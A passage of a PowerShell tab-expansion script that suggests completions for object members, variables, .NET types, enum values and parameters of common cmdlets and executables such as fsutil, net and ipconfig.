if ( "Get-Content" -eq $_cmdlet )
{
$global:_dummy = (type $PSHOME\\profile.ps1)[0]
}
if ( "Get-Credential" -eq $_cmdlet )
{
$global:_dummy = $null
}
if ( "Get-Culture" -eq $_cmdlet )
{
$global:_dummy = Get-Culture
}
if ( "Get-Date" -eq $_cmdlet )
{
$global:_dummy = Get-Date
}
if ( "Get-Event" -eq $_cmdlet )
{
$global:_dummy = (Get-Event)[0]
}
if ( "Get-EventLog" -eq $_cmdlet )
{
$global:_dummy = @(iex $str[$i+1])[0]
}
if ( "Get-ExecutionPolicy" -eq $_cmdlet )
{
$global:_dummy = Get-ExecutionPolicy
}
if ( "Get-Help" -eq $_cmdlet )
{
$global:_dummy = Get-Help Add-Content
}
if ( "Get-History" -eq $_cmdlet )
{
$global:_dummy = Get-History -Count 1
}
if ( "Get-Host" -eq $_cmdlet )
{
$global:_dummy = Get-Host
}
if ( "Get-Item" -eq $_cmdlet )
{
$global:_dummy = $global:_forgci
}
if ( "Get-ItemProperty" -eq $_cmdlet )
{
$global:_dummy = $null
}
if ( "Get-Location" -eq $_cmdlet )
{
$global:_dummy = Get-Location
}
if ( "Get-Member" -eq $_cmdlet )
{
$global:_dummy = (1|Get-Member)[0]
}
if ( "Get-Module" -eq $_cmdlet )
{
$global:_dummy = (Get-Module)[0]
}
if ( "Get-PfxCertificate" -eq $_cmdlet )
{
$global:_dummy = $null
}
if ( "Get-Process" -eq $_cmdlet )
{
$global:_dummy = ps powershell
}
if ( "Get-PSBreakpoint" -eq $_cmdlet )
{
$global:_dummy =
Add-Member -InputObject (New-Object PSObject) -Name Action -MemberType 'NoteProperty' -Value '' -PassThru |
Add-Member -Name Command -MemberType 'NoteProperty' -Value '' -PassThru |
Add-Member -Name Enabled -MemberType 'NoteProperty' -Value '' -PassThru |
Add-Member -Name HitCount -MemberType 'NoteProperty' -Value '' -PassThru |
Add-Member -Name Id -MemberType 'NoteProperty' -Value '' -PassThru |
Add-Member -Name Script -MemberType 'NoteProperty' -Value '' -PassThru
}
if ( "Get-PSCallStack" -eq $_cmdlet )
{
$global:_dummy = Get-PSCallStack
}
if ( "Get-PSDrive" -eq $_cmdlet )
{
$global:_dummy = Get-PSDrive Function
}
if ( "Get-PSProvider" -eq $_cmdlet )
{
$global:_dummy = Get-PSProvider FileSystem
}
if ( "Get-PSSnapin" -eq $_cmdlet )
{
$global:_dummy = Get-PSSnapin Microsoft.PowerShell.Core
}
if ( "Get-Service" -eq $_cmdlet )
{
$global:_dummy = (Get-Service)[0]
}
if ( "Get-TraceSource" -eq $_cmdlet )
{
$global:_dummy = Get-TraceSource AddMember
}
if ( "Get-UICulture" -eq $_cmdlet )
{
$global:_dummy = Get-UICulture
}
if ( "Get-Variable" -eq $_cmdlet )
{
$global:_dummy = Get-Variable _
}
if ( "Get-WmiObject" -eq $_cmdlet )
{
$global:_dummy = @(iex $str[$i+1])[0]
}
if ( "Group-Object" -eq $_cmdlet )
{
$global:_dummy = 1 | group
}
if ( "Measure-Command" -eq $_cmdlet )
{
$global:_dummy = Measure-Command {}
}
if ( "Measure-Object" -eq $_cmdlet )
{
$global:_dummy = Measure-Object
}
if ( "New-PSDrive" -eq $_cmdlet )
{
$global:_dummy = Get-PSDrive Alias
}
if ( "New-TimeSpan" -eq $_cmdlet )
{
$global:_dummy = New-TimeSpan
}
if ( "Resolve-Path" -eq $_cmdlet )
{
$global:_dummy = $PWD
}
if ( "Select-String" -eq $_cmdlet )
{
$global:_dummy = " " | Select-String " "
}
if ( "Set-Date" -eq $_cmdlet )
{
$global:_dummy = Get-Date
}
if ( $property -ne $null)
{
foreach ( $name in $property.Split(";", "RemoveEmptyEntries" -as [System.StringSplitOptions]) )
{
$global:_dummy = @($global:_dummy.$name)[0]
}
}
}
function TabExpansion {
# This is the default function to use for tab expansion. It handles simple
# member expansion on variables, variable name expansion and parameter completion
# on commands. It doesn't understand strings so strings containing ; | ( or { may
# cause expansion to fail.
param($line, $lastWord)
& {
# Helper function to write out the matching set of members. It depends
# on dynamic scoping to get $_base, _$expression and $_pat
function Write-Members ($sep='.')
{
# evaluate the expression to get the object to examine...
Invoke-Expression ('$_val=' + $_expression)
if ( $_expression -match '^\\$global:_dummy' )
{
$temp = $_expression -replace '^\\$global:_dummy(.*)','$1'
$_expression = '$_' + $temp
}
$_method = [Management.Automation.PSMemberTypes] `
'Method,CodeMethod,ScriptMethod,ParameterizedProperty'
if ($sep -eq '.')
{
$params = @{view = 'extended','adapted','base'}
}
else
{
$params = @{static=$true}
}
if ( $_val -is [Hashtable] )
{
[Microsoft.PowerShell.Commands.MemberDefinition[]]$_keys = $null
foreach ( $_name in $_val.Keys )
{
$_keys += `
New-Object Microsoft.PowerShell.Commands.MemberDefinition `
[int],$_name,"Property",0
}
}
if ( $_keys -ne $null )
{
$_members = (Get-Member @params -InputObject $_val $_pat) + ($_keys | ? {$_.name -like $_pat})
} else {
$_members = (Get-Member @params -InputObject $_val $_pat)
}
foreach ($_m in $_members | Sort-Object membertype,name)
{
if ($_m.MemberType -band $_method)
{
# Return a method...
$_base + $_expression + $sep + $_m.name + '('
}
else {
# Return a property...
$_base + $_expression + $sep + $_m.name
}
}
}
$host.UI.RawUI.WindowTitle = "Windows PowerShell V2 (CTP2)" + $lastword
switch -regex ($lastWord)
{
# Handle property and method expansion at '$_'
'(^.*)(\\$_\\.)(\\w*)$' {
$_base = $matches[1]
$_expression = '$global:_dummy'
$_pat = $matches[3] + '*'
$global:_dummy = $null
Get-PipeLineObject
if ( $global:_dummy -eq $null )
{
if ( $global:_exp -match '^\\$.*\\(.*$' )
{
$type = ( iex $global:_exp.Split("(")[0] ).OverloadDefinitions[0].Split(" ")[0] -replace '\\[[^\\[\\]]*\\]$' -as [type]
if ( $_expression -match '^\\$global:_dummy' )
{
$temp = $_expression -replace '^\\$global:_dummy(.*)','$1'
$_expression = '$_' + $temp
}
foreach ( $_m in $type.GetMembers() | sort membertype,name | group name | ? { $_.Name -like $_pat } | % { $_.Group[0] } )
{
if ($_m.MemberType -eq "Method")
{
$_base + $_expression + '.' + $_m.name + '('
}
else {
$_base + $_expression + '.' + $_m.name
}
}
break;
}
elseif ( $global:_exp -match '^\\[.*\\:\\:.*\\(.*$' )
{
$tname, $mname = $_exp.Split(":(", "RemoveEmptyEntries"-as [System.StringSplitOptions])[0,1]
$type = @(iex ($tname + '.GetMember("' + $mname + '")'))[0].ReturnType.FullName -replace '\\[[^\\[\\]]*\\]$' -as [type]
if ( $_expression -match '^\\$global:_dummy' )
{
$temp = $_expression -replace '^\\$global:_dummy(.*)','$1'
$_expression = '$_' + $temp
}
foreach ( $_m in $type.GetMembers() | sort membertype,name | group name | ? { $_.Name -like $_pat } | % { $_.Group[0] } )
{
if ($_m.MemberType -eq "Method")
{
$_base + $_expression + '.' + $_m.name + '('
}
else {
$_base + $_expression + '.' + $_m.name
}
}
break;
}
elseif ( $global:_exp -match '^(\\$\\w+(\\[[0-9,\\.]+\\])*(\\.\\w+(\\[[0-9,\\.]+\\])*)*)$' )
{
$global:_dummy = @(iex $Matches[1])[0]
}
else
{
$global:_dummy = $global:_mix
}
}
Write-Members
break;
}
# Handle property and method expansion rooted at variables...
# e.g. $a.b.<tab>
'(^.*)(\\$(\\w|\\.)+)\\.(\\w*)$' {
$_base = $matches[1]
$_expression = $matches[2]
$_pat = $matches[4] + '*'
[void] ( iex "$_expression.IsDataLanguageOnly" ) # for [ScriptBlock]
if ( $_expression -match '^\\$_\\.' )
{
$_expression = $_expression -replace '^\\$_(.*)',('$global:_dummy' + '$1')
}
Write-Members
break;
}
# Handle simple property and method expansion on static members...
# e.g. [datetime]::n<tab>
'(^.*)(\\[(\\w|\\.)+\\])\\:\\:(\\w*)$' {
$_base = $matches[1]
$_expression = $matches[2]
$_pat = $matches[4] + '*'
Write-Members '::'
break;
}
# Handle complex property and method expansion on static members
# where there are intermediate properties...
# e.g. [datetime]::now.d<tab>
'(^.*)(\\[(\\w|\\.)+\\]\\:\\:(\\w+\\.)+)(\\w*)$' {
$_base = $matches[1] # everything before the expression
$_expression = $matches[2].TrimEnd('.') # expression less trailing '.'
$_pat = $matches[5] + '*' # the member to look for...
Write-Members
break;
}
# Handle variable name expansion...
'(^.*\\$)(\\w+)$' {
$_prefix = $matches[1]
$_varName = $matches[2]
foreach ($_v in Get-ChildItem ('variable:' + $_varName + '*'))
{
$_prefix + $_v.name
}
break;
}
# Handle env&function drives variable name expansion...
'(^.*\\$)(.*\\:)(\\w+)$' {
$_prefix = $matches[1]
$_drive = $matches[2]
$_varName = $matches[3]
if ($_drive -eq "env:" -or $_drive -eq "function:")
{
foreach ($_v in Get-ChildItem ($_drive + $_varName + '*'))
{
$_prefix + $_drive + $_v.name
}
}
break;
}
# Handle array's element property and method expansion
# where there are intermediate properties...
# e.g. foo[0].n.b<tab>
'(^.*)(\\$((\\w+\\.)|(\\w+(\\[(\\w|,)+\\])+\\.))+)(\\w*)$'
{
$_base = $matches[1]
$_expression = $matches[2].TrimEnd('.')
$_pat = $Matches[8] + '*'
[void] ( iex "$_expression.IsDataLanguageOnly" ) # for [ScriptBlock]
if ( $_expression -match '^\\$_\\.' )
{
$_expression = $_expression -replace '^\\$_(.*)',('$global:_dummy' + '$1')
}
Write-Members
break;
}
# Handle property and method expansion rooted at type object...
# e.g. [System.Type].a<tab>
'(^\\[(\\w|\\.)+\\])\\.(\\w*)$'
{
if ( $(iex $Matches[1]) -isnot [System.Type] ) { break; }
$_expression = $Matches[1]
$_pat = $Matches[$matches.Count-1] + '*'
Write-Members
break;
}
# Handle complex property and method expansion on type object members
# where there are intermediate properties...
# e.g. [datetime].Assembly.a<tab>
'^(\\[(\\w|\\.)+\\]\\.(\\w+\\.)+)(\\w*)$' {
$_expression = $matches[1].TrimEnd('.') # expression less trailing '.'
$_pat = $matches[4] + '*' # the member to look for...
if ( $(iex $_expression) -eq $null ) { break; }
Write-Members
break;
}
# Handle property and method expansion rooted at close parenthes...
# e.g. (123).a<tab>
'^(.*)\\)((\\w|\\.)*)\\.(\\w*)$' {
$_base = $Matches[1] + ")"
if ( $matches[3] -eq $null) { $_expression = '[System.Type]' }
else { $_expression = '[System.Type]' + $Matches[2] }
$_pat = $matches[4] + '*'
iex "$_expression | Get-Member $_pat | sort MemberType,Name" |
% {
if ( $_.MemberType -like "*Method*" -or $_.MemberType -like "*Parameterized*" ) { $parenthes = "(" }
if ( $Matches[2] -eq "" ) { $_base + "." + $_.Name + $parenthes }
else { $_base + $Matches[2] + "." + $_.Name + $parenthes }
}
break;
}
# Handle .NET type name expansion ...
# e.g. [Microsoft.PowerShell.Com<tab>
'^\\[((\\w+\\.?)*)$' {
$_opt = $matches[1] + '*'
if ( $_opt -eq "*" )
{
$_TypeAccelerators -like $_opt -replace '^(.*)$', '[$1]'
}
else
{
$_TypeAccelerators -like $_opt -replace '^(.*)$', '[$1]'
Write-ClassNames $_TypeNames_System ($_opt.Split(".").Count-1) '['
Write-ClassNames $_TypeNames ($_opt.Split(".").Count-1) '['
}
break;
}
# Handle file/directory name which contains $env: variable
# e.g. $env:windir\\<tab>
'^\\$(env:)?\\w+([\\\\/][^\\\\/]*)*$' {
$path = iex ('"' + $Matches[0] + '"')
if ( $Matches[2].Length -gt 1 )
{
$parent = Split-Path $path -Parent
$leaf = (Split-Path $path -Leaf) + '*'
}
else
{
$parent = $path
$leaf = '*'
}
if ( Test-Path $parent )
{
$i = $Matches[0].LastIndexOfAny("/\\")
$_base = $Matches[0].Substring(0,$i+1)
[IO.Directory]::GetFileSystemEntries( $parent, $leaf ) | % { $_base + ($_.Split("\\/")[-1] -replace '([\\$\\s&])','`$1' -replace '([[\\]])', '````$1') }
}
}
# Do completion on parameters...
'^-([\\w0-9]*)' {
$_pat = $matches[1] + '*'
# extract the command name from the string
# first split the string into statements and pipeline elements
# This doesn't handle strings however.
$_command = [regex]::Split($line, '[|;=]')[-1]
# Extract the trailing unclosed block e.g. ls | foreach { cp
if ($_command -match '\\{([^\\{\\}]*)$')
{
$_command = $matches[1]
}
# Extract the longest unclosed parenthetical expression...
if ($_command -match '\\(([^()]*)$')
{
$_command = $matches[1]
}
# take the first space separated token of the remaining string
# as the command to look up. Trim any leading or trailing spaces
# so you don't get leading empty elements.
$_command = $_command.Trim().Split()[0]
# now get the info object for it...
$_command = @(Get-Command -type 'Cmdlet,Alias,Function,Filter,ExternalScript' $_command)[0]
# loop resolving aliases...
while ($_command.CommandType -eq 'alias')
{
$_command = @(Get-Command -type 'Cmdlet,Alias,Function,Filter,ExternalScript' $_command.Definition)[0]
}
if ( $_command -ne $null )
{
# expand the parameter sets and emit the matching elements
foreach ($_n in $_command.Parameters.Keys | sort)
{
if ($_n -like $_pat) { '-' + $_n }
}
}
else
{
"-and", "-as", "-band", "-bnot", "-bor", "-bxor", "-ccontains", "-ceq", "-cge", "-cgt", "-cle", "-clike", "-clt",
"-cmatch", "-cne", "-cnotcontains", "-cnotlike", "-cnotmatch", "-contains", "-creplace", "-csplit", "-eq", "-f", "-ge",
"-gt", "-icontains", "-ieq", "-ige", "-igt", "-ile", "-ilike", "-ilt", "-imatch", "-ine", "-inotcontains", "-inotlike",
"-inotmatch", "-ireplace", "-is", "-isnot", "-isplit", "-join", "-le", "-like", "-lt", "-match", "-ne", "-not", "-notcontains",
"-notlike", "-notmatch", "-or", "-replace", "-split", "-xor" -like "-$_pat"
}
break;
}
# try to find a matching command...
default {
$lastex = [regex]::Split($line, '[|;]')[-1]
if ( $lastex -match '^\\s*(\\$\\w+(\\[[0-9,]+\\])*(\\.\\w+(\\[[0-9,]+\\])*)*)\\s*=\\s+(("\\w+"\\s*,\\s+)*)"\\w+"\\s*-as\\s+$' )
{
if ( $Matches[6] -ne $nul )
{
$brackets = "[]"
}
'['+ $global:_enum + $brackets + ']'
break;
}
if ( $lastex -match '^\\s*(\\$\\w+(\\[[0-9,]+\\])*(\\.\\w+(\\[[0-9,]+\\])*)*)\\s*=\\s+(("\\w+"\\s*,\\s+)*)\\s*(\\w*)$' )
{
$_pat = $Matches[7] + '*'
$_type = @(iex $Matches[1])[0].GetType()
if ( $_type.IsEnum )
{
$global:_enum = $_type.FullName
[Enum]::GetValues($_type) -like $_pat -replace '^(.*)$','"$1"'
break;
}
}
$lastex = [regex]::Split($line, '[|;=]')[-1]
if ($lastex -match '[[$].*\\w+\\(.*-as\\s*$')
{
'['+ $global:_enum + ']'
}
elseif ( $lastex -match '([[$].*(\\w+))\\((.*)$' )
{
$_method = $Matches[1]
if ( $Matches[3] -match "(.*)((`"|')(\\w+,)+(\\w*))$" )
{
$continuous = $true
$_opt = $Matches[5] + '*'
$_base = $Matches[2].TrimStart('"') -replace '(.*,)\\w+$','$1'
$position = $Matches[1].Split(",").Length
}
else
{
$continuous = $false
$_opt = ($Matches[3].Split(',')[-1] -replace '^\\s*','') + "*"
$position = $Matches[3].Split(",").Length
}
if ( ($_mdefs = iex ($_method + ".OverloadDefinitions")) -eq $null )
{
$tname, $mname = $_method.Split(":", "RemoveEmptyEntries" -as [System.StringSplitOptions])
$_mdefs = iex ($tname + '.GetMember("' + $mname + '") | % { $_.ToString() }')
}
foreach ( $def in $_mdefs )
{
[void] ($def -match '\\((.*)\\)')
foreach ( $param in [regex]::Split($Matches[1], ', ')[$position-1] )
{
if ($param -eq $null -or $param -eq "")
{
continue;
}
$type = $param.split()[0]
if ( $type -like '*`[*' -or $type -eq "Params" -or $type -eq "" )
{
continue;
}
$fullname = @($_typenames -like "*$type*")
foreach ( $name in $fullname )
{
if ( $continuous -eq $true -and ( $name -as [System.Type] ).IsEnum )
{
$output = [Enum]::GetValues($name) -like $_opt -replace '^(.*)$',($_base + '$1')
$output | sort
}
elseif ( ( $name -as [System.Type] ).IsEnum )
{
$global:_enum = $name
$output = [Enum]::GetValues($name) -like $_opt -replace '^(.*)$','"$1"'
$output | sort
}
}
}
}
if ( $output -ne $null )
{
break;
}
}
if ( $line[-1] -eq " " )
{
$_cmdlet = $line.TrimEnd(" ").Split(" |(;={")[-1]
# now get the info object for it...
$_cmdlet = @(Get-Command -type 'cmdlet,alias' $_cmdlet)[0]
# loop resolving aliases...
while ($_cmdlet.CommandType -eq 'alias')
{
$_cmdlet = @(Get-Command -type 'cmdlet,alias' $_cmdlet.Definition)[0]
}
if ( "Set-ExecutionPolicy" -eq $_cmdlet.Name )
{
"Unrestricted", "RemoteSigned", "AllSigned", "Restricted", "Default" | sort
break;
}
if ( "Trace-Command","Get-TraceSource","Set-TraceSource" -contains $_cmdlet.Name )
{
Get-TraceSource | % { $_.Name } | sort -Unique
break;
}
if ( "New-Object" -eq $_cmdlet.Name )
{
$_TypeAccelerators
break;
}
if ( $_cmdlet.Noun -like "*WMI*" )
{
$_WMIClasses
break;
}
if ( "Get-Process" -eq $_cmdlet.Name )
{
Get-Process | % { $_.Name } | sort
break;
}
if ( "Add-PSSnapin", "Get-PSSnapin", "Remove-PSSnapin" -contains $_cmdlet.Name )
{
if ( $global:_snapin -ne $null )
{
$global:_snapin
break;
}
else
{
$global:_snapin = $(Get-PSSnapIn -Registered;Get-PSSnapIn)| sort Name -Unique;
$global:_snapin
break;
}
}
if ( "Get-PSDrive", "New-PSDrive", "Remove-PSDrive" `
-contains $_cmdlet.Name -and "Name" )
{
Get-PSDrive | sort
break;
}
if ( "Get-Eventlog" -eq $_cmdlet.Name )
{
Get-EventLog -List | % { $_base + ($_.Log -replace '\\s','` ') }
break;
}
if ( "Get-Help" -eq $_cmdlet.Name )
{
Get-Help -Category all | % { $_.Name } | sort -Unique
break;
}
if ( "Get-Service", "Restart-Service", "Resume-Service",
"Start-Service", "Stop-Service", "Suspend-Service" `
-contains $_cmdlet.Name )
{
Get-Service | sort Name | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Get-Command" -eq $_cmdlet.Name )
{
Get-Command -CommandType All | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Format-List", "Format-Custom", "Format-Table", "Format-Wide", "Compare-Object",
"ConvertTo-Html", "Measure-Object", "Select-Object", "Group-Object", "Sort-Object" `
-contains $_cmdlet.Name )
{
Get-PipeLineObject
$_dummy | gm -MemberType Properties,ParameterizedProperty | sort membertype | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Clear-Variable", "Get-Variable", "New-Variable", "Remove-Variable", "Set-Variable" -contains $_cmdlet.Name )
{
Get-Variable -Scope Global | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-Alias", "New-Alias", "Set-Alias" -contains $_cmdlet.Name )
{
Get-Alias | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
}
if ( $line[-1] -eq " " )
{
# extract the command name from the string
# first split the string into statements and pipeline elements
# This doesn't handle strings however.
$_cmdlet = [regex]::Split($line, '[|;=]')[-1]
# Extract the trailing unclosed block e.g. ls | foreach { cp
if ($_cmdlet -match '\\{([^\\{\\}]*)$')
{
$_cmdlet = $matches[1]
}
# Extract the longest unclosed parenthetical expression...
if ($_cmdlet -match '\\(([^()]*)$')
{
$_cmdlet = $matches[1]
}
# take the first space separated token of the remaining string
# as the command to look up. Trim any leading or trailing spaces
# so you don't get leading empty elements.
$_cmdlet = $_cmdlet.Trim().Split()[0]
# now get the info object for it...
$_cmdlet = @(Get-Command -type 'Application' $_cmdlet)[0]
if ( $_cmdlet.Name -eq "powershell.exe" )
{
"-PSConsoleFile", "-Version", "-NoLogo", "-NoExit", "-Sta", "-NoProfile", "-NonInteractive",
"-InputFormat", "-OutputFormat", "-EncodedCommand", "-File", "-Command" | sort
break;
}
if ( $_cmdlet.Name -eq "fsutil.exe" )
{
"behavior query", "behavior set", "dirty query", "dirty set",
"file findbysid", "file queryallocranges", "file setshortname", "file setvaliddata", "file setzerodata", "file createnew",
"fsinfo drives", "fsinfo drivetype", "fsinfo volumeinfo", "fsinfo ntfsinfo", "fsinfo statistics",
"hardlink create", "objectid query", "objectid set", "objectid delete", "objectid create",
"quota disable", "quota track", "quota enforce", "quota violations", "quota modify", "quota query",
"reparsepoint query", "reparsepoint delete", "sparse setflag", "sparse queryflag", "sparse queryrange", "sparse setrange",
"usn createjournal", "usn deletejournal", "usn enumdata", "usn queryjournal", "usn readdata", "volume dismount", "volume diskfree" | sort
break;
}
if ( $_cmdlet.Name -eq "net.exe" )
{
"ACCOUNTS ", " COMPUTER ", " CONFIG ", " CONTINUE ", " FILE ", " GROUP ", " HELP ",
"HELPMSG ", " LOCALGROUP ", " NAME ", " PAUSE ", " PRINT ", " SEND ", " SESSION ",
"SHARE ", " START ", " STATISTICS ", " STOP ", " TIME ", " USE ", " USER ", " VIEW" | sort
break;
}
if ( $_cmdlet.Name -eq "ipconfig.exe" )
{
"/?", "/all", "/renew", "/release", "/flushdns", "/displaydns",
"/registerdns", "/showclassid", "/setclassid"
break;
}
}
if ( $line -match '\\w+\\s+(\\w+(\\.|[^\\s\\.])*)$' )
{
#$_opt = $Matches[1] + '*'
$_cmdlet = $line.TrimEnd(" ").Split(" |(;={")[-2]
$_opt = $Matches[1].Split(" ,")[-1] + '*'
$_base = $Matches[1].Substring(0,$Matches[1].Length-$Matches[1].Split(" ,")[-1].length)
# now get the info object for it...
$_cmdlet = @(Get-Command -type 'cmdlet,alias' $_cmdlet)[0]
# loop resolving aliases...
while ($_cmdlet.CommandType -eq 'alias')
{
$_cmdlet = @(Get-Command -type 'cmdlet,alias' $_cmdlet.Definition)[0]
}
if ( "Set-ExecutionPolicy" -eq $_cmdlet.Name )
{
"Unrestricted", "RemoteSigned", "AllSigned", "Restricted", "Default" -like $_opt | sort
break;
}
if ( "Trace-Command","Get-TraceSource","Set-TraceSource" -contains $_cmdlet.Name )
{
Get-TraceSource -Name $_opt | % { $_.Name } | sort -Unique | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "New-Object" -eq $_cmdlet.Name )
{
$_TypeAccelerators -like $_opt
Write-ClassNames $_TypeNames_System ($_opt.Split(".").Count-1)
Write-ClassNames $_TypeNames ($_opt.Split(".").Count-1)
break;
}
if ( $_cmdlet.Name -like "*WMI*" )
{
Write-ClassNames $_WMIClasses ($_opt.Split("_").Count-1) -sep '_'
break;
}
if ( "Get-Process" -eq $_cmdlet.Name )
{
Get-Process $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Add-PSSnapin", "Get-PSSnapin", "Remove-PSSnapin" -contains $_cmdlet.Name )
{
if ( $global:_snapin -ne $null )
{
$global:_snapin -like $_opt | % { $_base + ($_ -replace '\\s','` ') }
break;
}
else
{
$global:_snapin = $(Get-PSSnapIn -Registered;Get-PSSnapIn)| sort Name -Unique;
$global:_snapin -like $_opt | % { $_base + ($_ -replace '\\s','` ') }
break;
}
}
if ( "Get-PSDrive", "New-PSDrive", "Remove-PSDrive" `
-contains $_cmdlet.Name -and "Name" )
{
Get-PSDrive -Name $_opt | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-PSProvider" -eq $_cmdlet.Name )
{
Get-PSProvider -PSProvider $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-Eventlog" -eq $_cmdlet.Name )
{
Get-EventLog -List | ? { $_.Log -like $_opt } | % { $_base + ($_.Log -replace '\\s','` ') }
break;
}
if ( "Get-Help" -eq $_cmdlet.Name )
{
Get-Help -Category all -Name $_opt | % { $_.Name } | sort -Unique
break;
}
if ( "Get-Service", "Restart-Service", "Resume-Service",
"Start-Service", "Stop-Service", "Suspend-Service" `
-contains $_cmdlet.Name )
{
Get-Service -Name $_opt | sort Name | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Get-Command" -eq $_cmdlet.Name )
{
Get-Command -CommandType All -Name $_opt | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Format-List", "Format-Custom", "Format-Table", "Format-Wide", "Compare-Object",
"ConvertTo-Html", "Measure-Object", "Select-Object", "Group-Object", "Sort-Object" `
-contains $_cmdlet.Name )
{
Get-PipeLineObject
$_dummy | Get-Member -Name $_opt -MemberType Properties,ParameterizedProperty | sort membertype | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Clear-Variable", "Get-Variable", "New-Variable", "Remove-Variable", "Set-Variable" -contains $_cmdlet.Name )
{
Get-Variable -Scope Global -Name $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-Alias", "New-Alias", "Set-Alias" -contains $_cmdlet.Name )
{
Get-Alias -Name $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
}
if ( $line -match '(-(\\w+))\\s+([^-]*$)' )
{
$_param = $matches[2] + '*'
$_opt = $Matches[3].Split(" ,")[-1] + '*'
$_base = $Matches[3].Substring(0,$Matches[3].Length-$Matches[3].Split(" ,")[-1].length)
#$_opt = ($Matches[3] -replace '(^.*\\s*,?\\s*)\\w*$','$1') + '*'
# extract the command name from the string
# first split the string into statements and pipeline elements
# This doesn't handle strings however.
$_cmdlet = [regex]::Split($line, '[|;=]')[-1]
# Extract the trailing unclosed block e.g. ls | foreach { cp
if ($_cmdlet -match '\\{([^\\{\\}]*)$')
{
$_cmdlet = $matches[1]
}
# Extract the longest unclosed parenthetical expression...
if ($_cmdlet -match '\\(([^()]*)$')
{
$_cmdlet = $matches[1]
}
# take the first space separated token of the remaining string
# as the command to look up. Trim any leading or trailing spaces
# so you don't get leading empty elements.
$_cmdlet = $_cmdlet.Trim().Split()[0]
# now get the info object for it...
$_cmdlet = @(Get-Command -type 'Cmdlet,Alias,Function,Filter,ExternalScript' $_cmdlet)[0]
# loop resolving aliases...
while ($_cmdlet.CommandType -eq 'alias')
{
$_cmdlet = @(Get-Command -type 'Cmdlet,Alias,Function,Filter,ExternalScript' $_cmdlet.Definition)[0]
}
if ( $_param.TrimEnd("*") -eq "ea" -or $_param.TrimEnd("*") -eq "wa" )
{
"SilentlyContinue", "Stop", "Continue", "Inquire" |
? { $_ -like $_opt } | sort -Unique
break;
}
if ( "Format-List", "Format-Custom", "Format-Table", "Format-Wide" -contains $_cmdlet.Name `
-and "groupBy" -like $_param )
{
Get-PipeLineObject
$_dummy | Get-Member -Name $_opt -MemberType Properties,ParameterizedProperty | sort membertype | % { $_.Name }
break;
}
if ( $_param.TrimEnd("*") -eq "ev" -or $_param.TrimEnd("*") -eq "ov" -or
"ErrorVariable" -like $_param -or "OutVariable" -like $_param)
{
Get-Variable -Scope Global -Name $_opt | % { $_.Name } | sort
break;
}
if ( "Tee-Object" -eq $_cmdlet.Name -and "Variable" -like $_param )
{
Get-Variable -Scope Global -Name $_opt | % { $_.Name } | sort
break;
}
if ( "Clear-Variable", "Get-Variable", "New-Variable", "Remove-Variable", "Set-Variable" -contains $_cmdlet.Name `
-and "Name" -like $_param)
{
Get-Variable -Scope Global -Name $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Export-Alias", "Get-Alias", "New-Alias", "Set-Alias" -contains $_cmdlet.Name `
-and "Name" -like $_param)
{
Get-Alias -Name $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Out-File","Export-CSV","Select-String","Export-Clixml" -contains $_cmdlet.Name `
-and "Encoding" -like $_param)
{
"Unicode", "UTF7", "UTF8", "ASCII", "UTF32", "BigEndianUnicode", "Default", "OEM" |
? { $_ -like $_opt } | sort -Unique
break;
}
if ( "Trace-Command","Get-TraceSource","Set-TraceSource" -contains $_cmdlet.Name `
-and "Name" -like $_param)
{
Get-TraceSource -Name $_opt | % { $_.Name } | sort -Unique | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "New-Object" -like $_cmdlet.Name )
{
if ( "ComObject" -like $_param )
{
$_ProgID -like $_opt | % { $_ -replace '\\s','` ' }
break;
}
if ( "TypeName" -like $_param )
{
if ( $_opt -eq "*" )
{
$_TypeAccelerators -like $_opt
}
else
{
$_TypeAccelerators -like $_opt
Write-ClassNames $_TypeNames_System ($_opt.Split(".").Count-1)
Write-ClassNames $_TypeNames ($_opt.Split(".").Count-1)
}
break;
}
}
if ( "New-Item" -eq $_cmdlet.Name )
{
if ( "ItemType" -like $_param )
{
"directory", "file" -like $_opt
break;
}
}
if ( "Get-Location", "Get-PSDrive", "Get-PSProvider", "New-PSDrive", "Remove-PSDrive" `
-contains $_cmdlet.Name `
-and "PSProvider" -like $_param )
{
Get-PSProvider -PSProvider $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-Location" -eq $_cmdlet.Name -and "PSDrive" -like $_param )
{
Get-PSDrive -Name $_opt | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-PSDrive", "New-PSDrive", "Remove-PSDrive" `
-contains $_cmdlet.Name -and "Name" -like $_param )
{
Get-PSDrive -Name $_opt | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-Command" -eq $_cmdlet.Name -and "PSSnapin" -like $_param)
{
if ( $global:_snapin -ne $null )
{
$global:_snapin -like $_opt | % { $_base + $_ }
break;
}
else
{
$global:_snapin = $(Get-PSSnapIn -Registered;Get-PSSnapIn)| sort Name -Unique;
$global:_snapin -like $_opt | % { $_base + ($_ -replace '\\s','` ') }
break;
}
}
if ( "Add-PSSnapin", "Get-PSSnapin", "Remove-PSSnapin" `
-contains $_cmdlet.Name -and "Name" -like $_param )
{
if ( $global:_snapin -ne $null )
{
$global:_snapin -like $_opt | % { $_base + ($_ -replace '\\s','` ') }
break;
}
else
{
